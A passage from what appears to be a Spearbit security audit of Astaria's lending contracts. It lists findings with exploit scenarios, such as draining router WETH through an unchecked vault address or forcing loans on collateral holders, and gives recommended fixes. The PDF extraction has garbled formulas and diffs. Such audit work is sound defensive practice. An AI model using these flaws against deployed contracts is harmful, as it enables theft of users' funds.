txn, we ultimately do not care where the txn came from as long as we are indeed offering the payment, and are getting everything that the auction should cost. Will mark it as acknowledged and tag this ticket with the updates when merged. Spearbit: Acknowledged. +5.2.16 c.lienRequest.strategy.vault is not checked to be a registered vault when commitToLiens is called Severity: High Risk Context: AstariaRouter.sol#L680-L683 called till when we end up calling IVaultImple- From when commitToLiens is Description: mentation(c.lienRequest.strategy.vault).commitToLien( ... ) of c.lienRequest.strategy.vault is not checked whether it is a registered vault within the system (by checking s.vaults). The caller can set this value to any address they would desire and potentially perform some unwanted actions. For example, the user could spoof all the values in commitments so that the later dependant contracts' checks are skipped and lastly we end up transferring funds: value after and the s.TRANSFER_PROXY.tokenTransferFrom( address(s.WETH), address(this), // <--- AstariaRouter address(msg.sender), totalBorrowed ); Not that since all checks are skipped, the caller can also indirectly set totalBorrowed to any value they would desire. And so, if AstariaRouter would hold any wETH at any point in time. Anyone can craft a payload to commitToLiens to drain its wETH balance. Recommendation: Check that the value of s.vaults[c.lienRequest.strategy.vault] is not address(0) be- fore calling c.lienRequest.strategy.vault's commitToLien endpoint. 25 Astaria: Solved in PR 197. Spearbit: Verified. +5.2.17 Anyone can take a loan out on behalf of any collateral holder at any terms Severity: High Risk Context: VaultImplementation.sol#L225 Description: In the _validateCommitment() function, the initial checks are intended to ensure that the caller who is requesting the lien is someone who should have access to the collateral that it's being taken out against. The caller also inputs a receiver, who will be receiving the lien. In this validation, this receiver is checked against the collateral holder, and the validation is approved in the case that receiver == holder. However, this does not imply that the collateral holder wants to take this loan. This opens the door to a malicious lender pushing unwanted loans on holders of collateral by calling commitToLien with their collateralId, as well as their address set to the receiver. This will pass the receiver == holder check and execute the loan. In the best case, the borrower discovers this and quickly repays the loan, incurring a fee and small amount of interest. In the worst case, the borrower doesn't know this happens, and their collateral is liquidated. Recommendation: Only allow calls from the holder or operator to lead to valid commitments: address holder = CT.ownerOf(collateralId); address operator = CT.getApproved(collateralId); - - - + + - - - - + if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) msg.sender != operator && CT.isApprovedForAll(holder, msg.sender) ) { if (operator != address(0)) { require(operator == receiver); } else { require(CT.isApprovedForAll(holder, receiver)); revert NotApprovedForBorrow(); } } +5.2.18 Strategist Interest Rewards will be 10x higher than expected due to incorrect divisor Severity: High Risk Context: PublicVault.sol#L564 Description: VAULT_FEE is set as an immutable argument in the construction of new vaults, and is intended to be set in basis points. However, when the strategist interest rewards are calculated in _handleStrategistIntere- stReward(), the VAULT_FEE is only divided by 1000. The result is that the fee calculated by the function will be 10x higher than expected, and the strategist will be dramatically overpaid. Recommendation: 26 unchecked { - + uint256 fee = x.mulDivDown(VAULT_FEE(), 1000); uint256 fee = x.mulDivDown(VAULT_FEE(), 10000); s.strategistUnclaimedShares += convertToShares(fee).safeCastTo88(); } Astaria: Resolved based on the following PR 203. Spearbit: Verified. +5.2.19 The lower bound for liquidationInitialAsk for new lines needs to be stricter Severity: High Risk Context: • LienToken.sol#L376-L381 • AstariaRouter.sol#L516 Description: params.lien.details.liquidationInitialAsk ( Lnew ) is only compared to params.amount ( Anew ) whereas in _appendStack newStack[j].lien.details.liquidationInitialAsk ( Lj ) is compared to poten- tialDebt. potentialDebt is the aggregated sum of all potential owed amount at the end of each position/lien. So in _appendStack we have: onew + on + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj Where oj potential interest at the end of its term. is _getOwed(newStack[j], newStack[j].point.end) which is the amount for the stack slot plus the So it would make sense to enforce a stricter inequality for Lnew : (1 + r (tend (cid:0) tnow ) 1018 )Anew = onew (cid:20) Lnew The big issue regarding the current lower bound is when the borrower only takes one lien and for this lien liqui- dationInitialAsk == amount (or they are close). Then at any point during the lien term (maybe very close to the end), the borrower can atomically self liquidate and settle the Seaport auction in one transaction. This way the borrower can skip paying any interest (they would need to pay OpenSea fees and potentially royalty fees) and plus they would receive liquidation fees. Recommendation: Make sure the following stricter lower bound is used instead: (1 + r (tend (cid:0) tnow ) 1018 )Anew = onew (cid:20) Lnew 27 +5.2.20 commitToLiens transfers extra assets to the borrower when protocol fee is present Severity: High Risk Context: • AstariaRouter.sol#L417-L422 • VaultImplementation.sol#L392 Description: totalBorrowed is the sum of all commitments[i].lienRequest.amount But if s.feeTo is set, some of funds/assets from the vaults get transefered to s.feeTo when _handleProtocolFee is called and only the remaining is sent to the ROUTER(). So in this scenario, the total amount of assets sent to ROUTER() (so that it can be transferred to msg.sender) is up to rounding errors: (1 (cid:0) np dp )T Where: • T is the totalBorrowed • np is s.protocolFeeNumerator • dp is s.protocolFeeDenominator But we are transferring T to msg.sender which is more than we are supposed to send, Recommendation: Make sure only (1 (cid:0) np dp )T is transfered to the borrower. Astaria: Acknowledged. Spearbit: Acknowledged. +5.2.21 Withdraw proxy's claim() endpoint updates public vault's yIntercept incorrectly. Severity: High Risk Context: • WithdrawProxy.sol#L235-L261 • WithdrawProxy.sol#L239 Description: Let parameter description y0 n En(cid:0)1 Bn(cid:0)1 Wn(cid:0)1 Sn(cid:0)1 Sv Bv V the yIntercept of our public vault in the question. the current epoch for the public vault. the expected storage parameter of the previous withdraw proxy. the asset balance of the previous withdraw proxy. the withdrawReserveReceived of the previous withdraw proxy. the total supply of the previous withdraw proxy. the total supply of the public vault when processEpoch() was last called on the public vault. the total balance of the public vault when processEpoch() was last called on the public vault. the public vault. 28 parameter description Pn(cid:0)1 the previous withdraw proxy. Then y0 is updated/decremented according to the formula (up to rounding errors due to division): y0 = y0 (cid:0) max(0, En(cid:0)1 (cid:0) (Bn(cid:0)1 (cid:0) Wn(cid:0)1))(1 (cid:0) Sn(cid:0)1 Sv ) Whereas the amount ( A ) of assets transfered from Pn(cid:0)1 to V is And the amount ( B ) of asset left in Pn(cid:0)1 after this transfer would be: A = (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) B = Wn(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1) Sn(cid:0)1 Sv (cid:1) (Bn(cid:0)1 (cid:0) Wn(cid:0)1) is supposed to represent the payment withdrawal proxy receives from Seaport auctions plus the amount of assets transferred to it by external actors. So A represents the portion of this amount for users who have not withdrawn from the public vault on the previous epoch and it is transferred to V and so y0 should be compensated positively. Also note that this amount might be bigger than En(cid:0)1 if a lien has a really high liquida- tionInitialAsk and its auction fulfills/matches near that price on Seaport. So it is possible that En(cid:0)1 < A. The current update formula for updating the y0 has the following flaws: • It only considers updating y0 when En(cid:0)1 (cid:0) (Bn(cid:0)1 (cid:0) Wn(cid:0)1) > 0 which is not always the case. • Decrements y0 by a portion of En(cid:0)1. The correct updating formula for y0 should be: y0 = y0 (cid:0) En(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) Also note, if we let Bn(cid:0)1 (cid:0) Wn(cid:0)1 = Xn(cid:0)1 + (cid:15), where Xn(cid:0)1 is the payment received by the withdraw proxy from Seaport auction payments and (cid:15) (if Wn(cid:0)1 updated correctly) be assets received from external actors by the previous withdraw proxy. Then: B = Wn(cid:0)1 + (Xn(cid:0)1 + (cid:15)) Sn(cid:0)1 Sv (cid:1) = h max(0, Bv (cid:0) En(cid:0)1) + Xn(cid:0)1 + (cid:15) i Sn(cid:0)1 Sv (cid:1) The last equality comes from the fact that when the withdraw reserves is fully transferred from the public vault and the current withdraw proxy (if necessary) to the previous withdraw proxy the amount Wn(cid:0)1 would hold should be max(0, Bv (cid:0) En(cid:0)1) Sn(cid:0)1 . Sv (cid:1) Related Issue. Recommendation: Make sure y0 is updated in claim() according to the following formula: y0 = y0 (cid:0) En(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) Astaria: Acknowledged. Spearbit: Acknowledged. 29 +5.2.22 Public vault's yIntercept is not updated when the full amount owed is not paid out by a Seaport auction. Severity: High Risk Context: LienToken.sol#L587 Description: When the full amountOwed for a lien is not paid out during the callback from Seaport to a collateral's ClearingHouse and if the payee is a public vault, we would need to decrement the yIntercept, otherwise the payee.totalAssets() would reflect a wrong value. Recommendation: When the above scenario happens make sure to call decreaseYIntercept with the difference of amountOwed and the payment received from the Seaport auction sale. Astaria: Solved by PR 219. Spearbit: Verified. +5.2.23 LienToken payee not reset on transfer Severity: High Risk Context: LienToken.sol#L303-L313 Description: payee and ownerOf are detached in that owners may set payee and owner may transfer the LienTo- ken to a new owner. payee does not reset on transfer. Exploit scenario: • Owner of a LienToken sets themselves as payee • Owner of LienToken sells the lien to a new owner • New owner does not update payee • Payments go to address set by old owner Recommendation: Reset payee on transfer. function transferFrom( address from, address to, uint256 id ) public override(ERC721, IERC721) { LienStorage storage s = _loadLienStorageSlot(); if (s.lienMeta[id].atLiquidation) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } delete s.lienMeta[id].payee; emit PayeeChanged(id, address(0)); super.transferFrom(from, to, id); + + } 30 +5.2.24 WithdrawProxy allows redemptions before PublicVault calls transferWithdrawReserve Severity: High Risk Context: WithdrawProxy.sol#L172-L175 Description: Anytime there is a withdraw pending (i.e. someone holds WithdrawProxy shares), shares may be redeemed so long as totalAssets() > 0 and s.finalAuctionEnd == 0. Under normal operating conditions totalAssets() becomes greater than 0 when then PublicVault calls trans- ferWithdrawReserve. totalAssets() can also be increased to a non zero value by anyone transferring WETH to the contract. If this occurs and a user attempts to redeem, they will receive a smaller share than they are owed. Exploit scenario: • Depositor redeems from PublicVault and receives WithdrawProxy shares. • Malicious actor deposits a small amount of WETH into the WithdrawProxy. • Depositor accidentally redeems, or is tricked into redeeming, from the WithdrawProxy while totalAssets() is smaller than it should be. • PublicVault properly processes epoch and full withdrawReserve is sent to WithdrawProxy. • All remaining holders of WithdrawProxy shares receive an outsized share as the previous shares we re- deemed for the incorrect value. Recommendation: • Option 1: Consider being explicit s.withdrawReserveReceived to be a non zero value: in opening the WithdrawProxy for redemptions (redeem/withdraw) by requiring - if (s.finalAuctionEnd != 0) { + if (s.finalAuctionEnd != 0 || s.withdrawReserveReceived == 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } Astaria notes there is a second scenario where funds are sent to the WithdrawProxy: auction payouts. For the above recommendation to be complete, auction payouts or claiming MUST also set withdrawReserveReceived. • Option 2: Instead of inferring when it is safe to withdraw based on finalAuctionEnd and withdrawReserveReceived, con- sider explicitly marking the withdraws as open when it is both safe to withdraw (i.e. expected funds deposited) and the vault has claimed its share. 31 5.3 Medium Risk +5.3.1 Point.position is not updated for stack slots in _removeStackPosition Severity: Medium Risk Context: • LienToken.sol#L402 • LienToken.sol#L809 is created, the newSlot.point.position is set In _createLien, when a new stack slot Description: uint8(params.stack.length) which would be its index in the stack. When _removeStackPosition is called to remove a slot newStack[i].point.position is not updated for indexes that are greater than position in the original stack. Also slot.point.position is only used when we emit AddLien and LienStackUpdated events. In both of those cases, we could have used params.stack.length Recommendation: If it is necessary to keep slot.point.position due to future upgrades, make sure to update _removeStackPosition so that it updates the positions as well. Otherwise, slot.point.position can be removed. Astaria: Issue is fixed in commit fa175c by removing the slot.point.position. from the stack at index position, the to Spearbit: Verified. +5.3.2 unchecked may cause under/overflows Severity: Medium Risk PublicVault.sol#L563, LienToken.sol#L424, LienToken.sol#L482, PublicVault.sol#L376, PublicVault.sol#L422, Public- Context: Vault.sol#L439, PublicVault.sol#L490, PublicVault.sol#L578, PublicVault.sol#L611, PublicVault.sol#L527, PublicVault.sol#L544, VaultImplementation.sol#L401, WithdrawProxy.sol#L254, WithdrawProxy.sol#L293 Description: unchecked should only be used when there is a guarantee of no underflows or overflows, or when they are taken into account. In absence of certainty, it's better to avoid unchecked to favor correctness over gas efficiency. For instance, if by error, protocolFeeNumerator is set to be greater than protocolFeeDenominator, this block in _handleProtocolFee() will underflow: PublicVault.sol#L640, unchecked { amount -= fee; } However, later this reverts due to the ERC20 transfer of an unusually high amount. This is just to demonstrate that unknown bugs can lead to under/overflows. Recommendation: Reason about each unchecked and remove them in absence of absolute certainty of safety. Astaria: Acknowledged. We'll put checks on setting protocol values to not cross unintended boundaries. Spearbit: Acknowledged. 32 +5.3.3 Multiple ERC4626Router and ERC4626RouterBase functions will always revert Severity: Medium Risk Context: • ERC4626Router.sol#L49-58 • ERC4626RouterBase.sol#L47 • ERC4626RouterBase.sol#L60 Description: The intention of the ERC4626Router.sol functions is that they are approval-less ways to deposit and redeem: // For the below, no approval needed, assumes vault is already max approved As long as the user has approved the TRANSFER_PROXY for WETH, this works for the depositToVault function: • WETH is transferred from user to the router with pullTokens. • The router approves the vault for the correct amount of WETH. • vault.deposit() is called, which uses safeTransferFrom to transfer WETH from router into vault. However, for the redeemMax function, it doesn't work: • Approves the vault to spend the router's WETH. • vault.redeem() is called, which tries to transfer vault tokens from the router to the vault, and then mints withdraw proxy tokens to the receiver. This error happens assuming that the vault tokens would be burned, in which case the logic would work. But since they are transferred into the vault until the end of the epoch, we require approvals. The same issue also exists in these two functions in ERC4626RouterBase.sol: • redeem(): this is where the incorrect approval lives, so the same issue occurs when it is called directly. • withdraw(): the same faulty approval exists in this function. Recommendation: redeemMax should follow the same flow as deposit to make this work: • redeemMax should pullTokens to pull the vault tokens from the user. • The router should approve the vault to spend its own tokens, not WETH. • Then we can call vault.redeem() and it will work as intended. Both the ERC4626RouterBase functions should change the approval to be vault tokens rather than WETH: - ERC20(vault.asset()).safeApprove(address(vault), amount); + vault.safeApprove(address(vault), amount); +5.3.4 UniV3 tokens with fees can bypass strategist checks Severity: Medium Risk Context: UNI_V3Validator.sol#L117-119 Description: Each UniV3 strategy includes a value for fee in nlrDetails that is used to constrain their strategy to UniV3 pools with matching fees. This is enforced with the following check (where details.fee is the strategist's set fee, and fee is the fee returned from Uniswap): if (details.fee != uint24(0) && fee != details.fee) { revert InvalidFee(); } 33 This means that if you set details.fee to 0, this check will pass, even if the real fee is greater than zero. Recommendation: If this is the intended behavior and you would like strategists to have a number they can use to accept all fee levels, I would recommend choosing a number other than zero (since it's a realistic value that strategists may want to set fees for). Otherwise, adjust the check as follows: - if (details.fee != uint24(0) && fee != details.fee) { + if (fee != details.fee) { revert InvalidFee(); } For more flexibility, you could also allow all fees lower than the strategist set fee to be acceptable: - if (details.fee != uint24(0) && fee != details.fee) { + if (fee > details.fee) { revert InvalidFee(); } +5.3.5 If auction time is reduced, withdrawProxy can lock funds from final auctions Severity: Medium Risk Context: WithdrawProxy.sol#L295 Description: When a new liquidation happens, the withdrawProxy sets s.finalAuctionEnd to be equal to the new incoming auction end. This will usually be fine, because new auctions start later than old auctions, and they all have the same length. However, if the auction time is reduced on the Router, it is possible for a new auction to have an end time that is sooner than an old auction. The result will be that the WithdrawProxy is claimable before it should be, and then will lock and not allow anyone to claim the funds from the final auction. Recommendation: Replace this with a check like: uint40 auctionEnd = (block.timestamp + finalAuctionDelta).safeCastTo40(); if (auctionEnd > s.finalAuctionEnd) s.finalAuctionEnd = auctionEnd; Astaria: Fixed in commit 050487. Spearbit: Verified. +5.3.6 claim() will underflow and revert for all tokens without 18 decimals Severity: Medium Risk Context: WithdrawProxy.sol#238-244 Description: In the claim() function, the amount to decrease the Y intercept of the vault is calculated as: (s.expected - balance).mulWadDown(10**ERC20(asset()).decimals() - s.withdrawRatio) s.withdrawRatio is represented as a WAD (18 decimals). As a result, using any token with a number of decimals under 17 (assuming the withdraw ratio is greater than 10%) will lead to an underflow and cause the function to revert. In this situation, the token's decimals don't matter. They are captured in the s.expected and balance, and are also the scale at which the vault's y-intercept is measured, so there's no need to adjust for them. Note: I know this isn't a risk in the current implementation, since it's WETH only, but since you are planning to generalize to accept all ERC20s, this is important. Recommendation: 34 if (balance < s.expected) { PublicVault(VAULT()).decreaseYIntercept( (s.expected - balance).mulWadDown( - + 10**ERC20(asset()).decimals() - s.withdrawRatio 1e18 - s.withdrawRatio ) ); } +5.3.7 Call to Royalty Engine can block NFT auction Severity: Medium Risk Context: CollateralToken.sol#L481 Description: _generateValidOrderParameters() calls ROYALTY_ENGINE.getRoyaltyView() twice. The first call is wrapped in a try/catch. This lets Astaria to continue even if the getRoyaltyView() reverts. However, the second call is not safe from this. Both these calls have the same parameters passed to it except the price (startingPrice vs endingPrice). case they are different, there exists a possibility that the second call can revert. In Recommendation: Wrap the second call in a try/catch. In case of a revert, the execution will be transferred to an empty catch block. Here is a sample: if (foundRecipients.length > 0) { try s.ROYALTY_ENGINE.getRoyaltyView( underlying.tokenContract, underlying.tokenId, endingPrice ) returns (, uint256[] memory foundEndAmounts) { recipients = foundRecipients; royaltyStartingAmounts = foundAmounts; royaltyEndingAmounts = foundEndAmounts; } catch {} } Astaria: Acknowledged. We have a change pending that removes the royalty engine as apart of multi token. Spearbit: Acknowledged. +5.3.8 Expired liens taken from public vaults need to be liquidated otherwise processing an epoch halts/reverts Severity: Medium Risk Context: PublicVault.sol#L275-L277 Description: s.epochData[s.currentEpoch].liensOpenForEpoch is decremented or is supposed to be decre- mented, when for a lien with an end that falls on this epoch: • The full payment has been made, • Or the lien is bought out by a lien that is from a different vault or ends at a higher epoch, • Or the lien is liquidated. If for some reason a lien expires and no one calls liquidate, then s.epochData[s.currentEpoch].liensOpenForEpoch > 0 will be true and processEpoch() would revert till someones calls liquidate. Note that a lien's end falling in the s.currentEpoch and timeToEpochEnd() == 0 imply that the lien is expired. 35 Recommendation: Astaria would need to have a monitoring solution setup to make sure the liquidate endpoint gets called for expired liens without delay. Astaria: Acknowledged. Spearbit: Acknowledged. +5.3.9 assets < s.depositCap invariant can be broken for public vaults with non-zero deposit caps Severity: Medium Risk Context: • PublicVault.sol#L207-L208 • PublicVault.sol#L231-L232 Description: The following check in mint / deposit does not take into consideration the new shares / amount sup- plied to the endpoint, since the yIntercept in totalAssets() is only updated after calling super.mint(shares, receiver) or super.deposit(amount, receiver) with the afterDeposit hook. uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Thus the new shares or amount provided can be a really big number compared to s.depositCap, but the call will still go through. Recommendation: To have the inequality assets < s.depositCap to be always correct, we would need to cal- culate the to be updated value of assets beforehand and then perform the check. +5.3.10 redeemFutureEpoch transfers the shares from the msg.sender to the vault instead of from the owner Severity: Medium Risk Context: PublicVault.sol#L143 Description: redeemFutureEpoch transfers the vault shares from the msg.sender to the vault instead of from the owner. Recommendation: The 1st parameter passed to the ERC20(address(this)).safeTransferFrom needs to be the owner: - ERC20(address(this)).safeTransferFrom(msg.sender, address(this), shares); + ERC20(address(this)).safeTransferFrom(owner, address(this), shares); Astaria: Fixed in 443b0e01263755a64c98e3554b43a8fbfa1de215. Spearbit: Verified. 36 +5.3.11 Lien buyouts can push maxPotentialDebt over the limit Severity: Medium Risk Context: LienToken.sol#L143-148 Description: When a lien is bought out, _buyoutLien calls _getMaxPotentialDebtForCollateral to confirm that this number is lower than the maxPotentialDebt specified in the lien. However, this function is called with the existing stack, which hasn't yet replaced the lien with the new, bought out lien. Valid refinances can make the rate lower or the time longer. In the case that a lien was bought out for a longer duration, maxPotentialDebt will increase and could go over the limit specified in the lien. Recommendation: Perform this check after the old lien has been replaced by the new lien in the stack. Astaria: Fixed in PR 211. Spearbit: Verified. +5.3.12 Liens cannot be bought out once we've reached the maximum number of active liens on one collateral Severity: Medium Risk Context: LienToken.sol#L373-375 Description: The buyoutLien function is intended to transfer ownership of a lien from one user to another. In practice, it creates a new lien by calling _createLien and then calls _replaceStackAtPositionWithNewLien to update the stack. In the _createLien function, there is a check to ensure we don't take out more than maxLiens against one piece of collateral: if (params.stack.length >= s.maxLiens) { revert InvalidState(InvalidStates.MAX_LIENS); } The result is that, when we already have maxLiens and we try to buy one out, this function will revert. Recommendation: Move this check from _createLien into the _appendStack function, which is only called when new liens are created rather than when they are bought out. Astaria: Fixed in PR 213. Spearbit: Verified. +5.3.13 First vault deposit can cause excessive rounding Severity: Medium Risk Context: ERC4626-Cloned.sol#L130 Description: Aside from storage layout/getters, the context above notes the other major departure from Solmate's ERC4626 implementation. The modification requires the initial mint to cost 10 full WETH. 37 + + + function mint( uint256 shares, address receiver ) public virtual returns (uint256 assets) { // assets is 10e18, or 10 WETH, whenever totalSupply() == 0 assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up. // Need to transfer before minting or ERC777s could reenter. // minter transfers 10 WETH to the vault ERC20(asset()).safeTransferFrom(msg.sender, address(this), assets); // shares received are based on user input _mint(receiver, shares); emit Deposit(msg.sender, receiver, assets, shares); afterDeposit(assets, shares); } Astaria highlighted that the code diff from Solmate is in relation to this finding from the previous Sherlock audit. However, deposit is still unchanged and the initial deposit may be 1 wei worth of WETH, in return for 1 wad worth of vault shares. Further, the previously cited issue may still surface by calling mint in a way that sets the price per share high (e.g. 10 shares for 10 WETH produces a price per of 1:1e18). Albeit, at a higher cost to the minter to set the initial price that high. Recommendation: Revert the hardcoding of 10e18 in previewMint and previewWithdraw, this will require the first minting to be 1:1 asset to share price. Prevent share price manipulation, add a condition in each of mint and deposit reverting if assets (when de- positing) or shares (when minting) not above the minimum asset amount when totalSupply() == 0. This comes at the cost of a duplicate storage read. For WETH vaults, minimum asset amount for initial deposit can be a small amount, such as 100 gwei so long as shares are issued 1:1 for the first mint/deposit. +5.3.14 When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0) Severity: Medium Risk Context: LienToken.sol#L472-L477 is listed on SeaPort by the borrower using listForSaleOnSeaport, Description: When the collateral s.auctionData[collateralId].liquidator (s.auctionData in general) will not be set and so it will be address(0) and thus the liquidatorPayment will be sent to address(0). Recommendation: Before calculating and transferring the liquidation fee make sure that the liquidator is not address(0). Astaria: Fixed in PR 206. Spearbit: Verified. 38 +5.3.15 potentialDebt is not compared against a new lien's maxPotentialDebt in _appendStack Severity: Medium Risk Context: LienToken.sol#L435-L439 Description: In _appendStack, we have the following block: newStack = new Stack[](stack.length + 1); newStack[stack.length] = newSlot; uint256 potentialDebt = _getOwed(newSlot, newSlot.point.end); ... if ( stack.length > 0 && potentialDebt > newSlot.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Note, we are only performing a comparison between newSlot.lien.details.maxPotentialDebt and poten- tialDebt when stack.length > 0. If _createLien is called with params.stack.length == 0, we would not perform this check and thus the input params is not fully checked for misconfiguration. Recommendation: Make sure to perform this check in either _createLien or here in _appendStack by removing the stack.length > 0 condition: // `potentialDebt` needs to be calculated in `_createLien` if ( potentialDebt > params.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Astaria: Acknowledged. Spearbit: Acknowledged. +5.3.16 Previous withdraw proxy's withdrawReserveReceived is not updated when assets are drained from the current withdraw proxy to the previous Severity: Medium Risk Context: PublicVault.sol#L378-L381 Description: When drain is called, we don't update the s.epochData[s.currentEpoch - 1]'s withdrawRe- serveReceived, this is in contrast to when withdraw reserves are transferred from the public vault to the withdraw proxy. This would unlink the previous withdraw proxy's withdrawReserveReceived storage parameter to the total amount of assets it has received from either the public vault or the current withdraw proxy. An actor can manipulate Bn(cid:0)1 (cid:0) Wn(cid:0)1's value by sending assets to the public vault and the current withdraw proxy before calling transferWithdrawReserve ( Bn(cid:0)1 is the previous withdraw proxy's asset balance, Wn(cid:0)1 is previous withdraw proxy's withdrawReserveReceived and n is public vault's epoch). Bn(cid:0)1 (cid:0) Wn(cid:0)1 should really represent the sum of all near-boundary auction payment's the previous withdraw proxy receives plus any assets that are transferred to it by an external actor. Related Issue 46. Recommendation: The current behavior of draining assets from the current withdraw proxy to the previous is inconsistent compared to when assets are transferred from the public vault to the previous withdraw proxy which: • Updates the public vault's s.withdrawReserve. • Transfers the assets. • Updates the previous withdraw proxy's withdrawReserveReceived. 39 In the case of the drain the first two points are performed but the last one is missing. Based on the behavior and other calculations it seems that withdrawReserveReceived would also need to be updated. +5.3.17 Update solc version and use unchecked in Uniswap related libraries Severity: Medium Risk Context: FullMathUniswap.sol, LiquidityAmounts.sol, TickMath.sol Description: The highlighted libraries above are referenced from Uniswap codebase which is intended to work with Solidity compiler <0.8. These older versions have unchecked arithmetic by default and the code takes it into account. Astaria code is intended to work with Solidity compiler >=0.8 which doesn't have unchecked arithmetic by default. Hence, to port the code, it has to be turned on via unchecked keyword. For example, FullMathUniswap.mulDiv(type(uint).max, type(uint).max, type(uint).max) reverts for v0.8, and returns type(uint).max for older version. Recommendation: • Update the pragma of all the three files to: pragma solidity ^0.8.4; • Wrap all the function bodies in unchecked. Astaria: Fixed in PR 9. Spearbit: Verified. 5.4 Low Risk +5.4.1 buyoutLien is prone to race conditions Severity: Low Risk Context: • LienToken.sol#L102 • VaultImplementation.sol#L305 Description: LienToken.buyoutLien and VaultImplementation.buyoutLien are both prone to race conditions where multiple vaults can try to front-run each others' buyoutLien call to end up registering their own lien. Also note, due to the storage values s.minInterestBPS and s.minDurationIncrease being used in the is- ValidRefinance, the winning buyoutLien call does not necessarily have to have the best rate or duration among the other candidates in the race. Recommendation: Make sure to document this. The current race between the vaults is not in an ideal condition for vaults and only sometimes in favor of picking the best liens for the borrower. A better mechanism to avoid the race condition would be to introduce an auctioning process to buy out a lien and make sure the auction's picking strategy is sound. Astaria: Acknowledged. Spearbit: Acknowledged. 40 +5.4.2 ERC20-Cloned allows certain actions for address(0) Severity: Low Risk Context: • ERC20-Cloned.sol#L39 • ERC20-Cloned.sol#L99 • ERC20-Cloned.sol#L76 • ERC20-Cloned.sol#L167 • ERC20-Cloned.sol#L180 • ERC20-Cloned.sol#L46 Description: In ERC20-Cloned, address(0) can be used as the: • spender (spender) • to parameter of transferFrom. • to parameter of transfer. • to parameter of _mint. • from parameter of _burn. As an example, one can transfer or transferFrom to address(0) which would turn the amount of tokens unus- able but those not update the total supply in contrast to if _burn was called. Recommendation: The decision to not check these addresses to make sure they cannot be assigned to ad- dress(0) is against the OpenZepplin implementation of ERC20. It is recommended to have these checks to avoid introducing quirks regarding address(0). Astaria: Acknowledged. Spearbit: Acknowledged. +5.4.3 BEACON_PROXY_IMPLEMENTATION and WETH cannot be updated for AstariaRouter Severity: Low Risk Context: • IAstariaRouter.sol#L67 • IAstariaRouter.sol#L72 Description: There is no update mechanism for BEACON_PROXY_IMPLEMENTATION and WETH in AstariaRouter. It would make sense that one would want to keep WETH as not upgradable (unless we provide the wrong address to the constructor). But for BEACON_PROXY_IMPLEMENTATION there could be possibilities of potentially upgrading it. Recommendation: If there is no plan to add an upgrading mechanism to these storage parameters, they can be defined as immutables. Also if there is a plan to use a diamond/facet pattern for the AstariaRouter and related contract, it might be best to document it so that it is more clear the reasoning for the current storage structures. And finally, other implementation parameters have been made upgradable, it would make sense to also have BEACON_PROXY_IMPLEMENTATION to be upgradable or document why it is not so currently. Astaria: wETH being a storage variable is removed in an open PR, so will acknowledge the lack of a setter, it came from a previously immutable design, the beacon proxy is not designed to be updated either in its current form, as any changes to the underlying or new features would leave older proxies in the dust. Spearbit: Acknowledged by Astaria. 41 +5.4.4 Incorrect key parameter type is used for s.epochData Severity: Low Risk Context: PublicVault.sol#/* Description: In PublicVault, whenever the epoch key provided is to the mapping s.epochData its type is uint64, but the type of s.epochData is mapping(uint256 => EpochData) Recommendation: Since the epochs have uint64 type, it would be best to define VaultData as: struct VaultData { uint88 yIntercept; uint48 slope; uint40 last; uint64 currentEpoch; // <-- pay attention to the type of epochs uint88 withdrawReserve; uint88 liquidationWithdrawRatio; uint88 strategistUnclaimedShares; mapping(uint64 => EpochData) epochData; // <-- changed line } +5.4.5 buyoutLien, canLiquidate and makePayment have different notion of expired liens when considering edge cases Severity: Low Risk Context: • VaultImplementation.sol#L305 • LienToken.sol#L731 • AstariaRouter.sol#L509 Description: When swapping a lien that is just expired (lien's end tend equals to the current timestamp tnow ), one can call buyoutLien to swap it out. But when tnow > tend , buyoutLien reverts due to the underflow in _- getRemainingInterest when calculating the buyout amount. This is in contrast to canLiquidate which allows a lien with tnow = tend to liquidate as well. makePayment also only considers tend < tnow as expired liens. So the expired/non-functional liens time ranges for different endpoints are: endpoint expired range buyoutLien canLiquidate makePayment (tend , 1) [tend , 1) (tend , 1) Recommendation: Make sure the edge case of tnow = tend is treated consistently for expired liens across the 3 endpoints in this context. Astaria: All the ranges have been unified to consider [tend , 1) as the expired range in commit 36ceb. Spearbit: Verified. 42 +5.4.6 Ensure all ratios are less than 1 Severity: Low Risk Context: AstariaRouter.sol#L212-L227 Description: Although, numerators and denominators for different fees are set by admin, it's a good practice to add a check in the contract for absurd values. In this case, that would be when numerator is greater than denominator. Recommendation: Add a require check for each numerator highlighted in Context: require(numerator < denominator, "MAX_FEE_EXCEEDED"); You can also use custom errors instead. Astaria: Fixed in commits b43317 and a883a3. Spearbit: Verified. +5.4.7 Factor out s.slope updates Severity: Low Risk Context: • PublicVault.sol#L422 • PublicVault.sol#L491 • PublicVault.sol#L528 • PublicVault.sol#L579 • PublicVault.sol#L615 Description: Slope updates occur in multiple locations but do not emit events. Recommendation: Emit an event when updating slope. For ease of testing consider moving slope updates to an internal function and emit an event when called. +5.4.8 External call to arbitrary address Severity: Low Risk Context: AstariaRouter.commitToLiens, AstariaRouter. _executeCommitment Description: The Router has a convenience function to commit to multiple liens AstariaRouter.commitToLiens. This function causes the router to receive WETH and allows the caller to supply an arbitrary vault address lien- Request.strategy.vault which is called by the router. This allows the potential for the caller to re-enter in the middle of the loop, and also allows them to drain any WETH that happens to be in the Router. In our review, no immediate reason for the Router to have WETH outside of commitToLiens calls was identified and therefore the severity of this finding is low. Recommendation: To protect against potential malicious calls, isValidVault should be checked against any calls to vaults. 43 +5.4.9 Astaria's Seaport orders 